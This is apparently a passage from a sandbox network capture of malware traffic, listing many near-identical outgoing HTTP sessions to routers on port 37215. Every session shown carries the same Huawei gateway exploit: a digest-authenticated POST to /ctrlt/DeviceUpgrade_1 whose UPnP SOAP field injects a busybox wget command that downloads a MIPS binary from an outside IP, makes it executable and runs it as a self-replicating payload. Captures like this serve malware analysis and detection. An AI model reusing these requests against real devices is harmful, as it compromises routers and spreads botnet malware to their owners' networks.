                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1637192.168.2.1358508197.38.75.5437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.596793890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1638192.168.2.1345506158.254.47.8237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.596806049 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1639192.168.2.134001641.98.147.18037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.596813917 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1640192.168.2.1350252157.124.164.24437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597008944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1641192.168.2.133795641.71.244.18437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597057104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1642192.168.2.1343100157.198.235.8737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597121954 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1643192.168.2.1346396157.135.177.22837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597152948 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1644192.168.2.1355952157.109.64.22337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597194910 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1645192.168.2.1352688197.79.61.3137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597225904 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1646192.168.2.1333814197.180.11.6537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597278118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 